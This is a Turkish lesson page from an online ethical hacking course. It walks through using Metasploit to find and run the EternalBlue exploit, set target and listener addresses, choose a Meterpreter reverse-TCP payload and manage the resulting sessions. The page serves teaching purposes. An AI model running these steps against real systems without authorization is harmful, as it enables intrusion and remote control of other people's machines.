İstismarları Arama ve Kullanma
Bulun ve çalıştırın
İstismarları Arama ve Kullanma, CoddyKit'te ücretsiz bir Ethical Hacking Academy dersidir. Bu, 4 dersinin 2. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Ethical Hacking Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.
Keşiften İstismara
Tarama sonrasında hedefin hizmetlerini ve sürümlerini bilirsiniz. Sıradaki adım, bu sürümlerdeki bilinen bir güvenlik açığıyla eşleşen bir istismar modülü bulmaktır.
Metasploit'in search komutu, binlerce modüle açılan kapınızdır. Hassas arama yapmak zamandan kazandırır ve yanlış kodu çalıştırmanızı önler.
Temel Arama
search komutu, modül dizinini anahtar kelimeye göre sorgular. Yazılım adına, CVE'ye veya hizmete göre arama yapabilirsiniz.
search eternalblue
search type:exploit platform:windows smbArama Süzgeçleri
Sonuçları şu süzgeçlerle daraltın:
- type: exploit, auxiliary, post.
- platform: windows, linux, unix.
- cve: belirli bir CVE tanımlayıcısı.
- rank: excellent, great, good (güvenilirlik).
Süzgeçleri birleştirmek, binlerce modülü hızla bir avuç seçeneğe indirir.
search cve:2017-0144 type:exploitArama Çıktısını Okuma
Arama sonuçları her modülü bir rank, bir ifşa tarihi ve bir check göstergesiyle listeler. Sıralama, istismarın güvenilirliğini ve güvenliğini yansıtır.
- excellent: hedefin çökmesine neden olma olasılığı düşüktür.
- great/good: yaygın koşullarda güvenilirdir.
- low/manual: risklidir veya dikkatli bir kurulum gerektirir.
Üretim sistemlerinin çökmesini önlemek için daha yüksek sıralamalı modülleri tercih edin.
Modül Yükleme
use komutuyla modülün dizin numarasını veya tam yolunu kullanın. İstem, yüklenen modülü gösterecek şekilde değişir ve veri deposu artık bu modülün seçeneklerini içerir.
use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >Modülü İnceleme
Çalıştırmadan önce modül hakkında bilgi edinin. info; açıklamayı, referansları (CVE'ler, uyarılar), gerekli seçenekleri ve desteklenen hedefleri gösterir.
Bir modülün ne yaptığını anlamak, profesyonel ve sorumlu kullanımın bir parçasıdır; anlamadığınız bir istismarı asla çalıştırmayın.
info
show options
show targetsSeçenekleri Ayarlama
Gerekli seçenekleri set komutuyla yapılandırın. Uzaktan gerçekleştirilen bir istismar için yaygın seçenekler hedef adresi ve yük ayarlarınızdır.
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2check Komutu
Birçok istismar, hedefin gerçekten istismara açık görünüp görünmediğini gerçekten istismar etmeden güvenli bir şekilde test eden check komutunu destekler.
Önce check komutunu çalıştırmak iyi bir uygulamadır: bir sistemin çökme riskini azaltır ve çabanızı gerçek bir fırsata harcamak üzere olduğunuzu doğrular.
check
# [+] 10.10.10.40:445 - The target is vulnerable.Yükü Seçme
Bir istismarın yüke ihtiyacı vardır. Metasploit varsayılan bir yük seçer, ancak hedefe ve erişim ihtiyaçlarınıza uygun bir yükü listeleyip seçebilirsiniz.
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcpÇalıştırma ve Oturumlar
exploit (veya run) komutuyla başlatın. Başarılı olursa hedefe etkileşimli bir bağlantı olan bir oturum elde edersiniz.
Birden çok oturumu listelemek için sessions -l, etkileşim kurmak için sessions -i N kullanın. Konsolda çalışmaya devam etmek için background komutuyla bir oturumu arka plana alın.
exploit
sessions -l
sessions -i 1Genel Seçenekler ve Modül Seçenekleri
LHOST gibi bazı ayarlar birçok modülde yeniden kullanılır. Modüller arasında her geçişte bunları yeniden yazmamak için setg ile genel olarak ayarlayın.
set: yalnızca geçerli modüle uygulanır.setg: modüller genelinde uygulanır.unsetg: genel bir değeri temizler.
Bu, çok sayıda modül içeren uzun süreli çalışmalar sırasında zaman kazandırır.
setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40Hızlı Kontrol
Bir istismarı çalıştırmadan önce sorumlu adımı seçin.
Özet
İstismarları bulmayı ve çalıştırmayı öğrendiniz:
- Modülleri bulmak için filtrelerle (tür, platform, cve, rank) search kullanın.
- Güvenilirlik ve güvenlik için daha yüksek rank değerine sahip modülleri tercih edin.
- Yüklemek için use, incelemek için info/show options, yapılandırmak için set kullanın.
- Önce check, ardından bir oturum elde etmek için exploit çalıştırın.
- Oturumları sessions -l/-i ile yönetin.
Sırada: yükler ve istismar sonrası Meterpreter kabuğu.
Sıkça Sorulan Sorular
“İstismarları Arama ve Kullanma” dersi ücretsiz mi?
Evet — “İstismarları Arama ve Kullanma” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Ethical Hacking Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.
“İstismarları Arama ve Kullanma” dersinde ne öğreneceğim?
Bulun ve çalıştırın Ethical Hacking Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Ethical Hacking Academy öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Ethical Hacking Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 2. dersidir.
“İstismarları Arama ve Kullanma” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Ethical Hacking Academy dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Ethical Hacking Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- Metasploit Mimarisi
- İstismarları Arama ve Kullanma
- Yükler ve Meterpreter
- İstismar Sonrası Modüller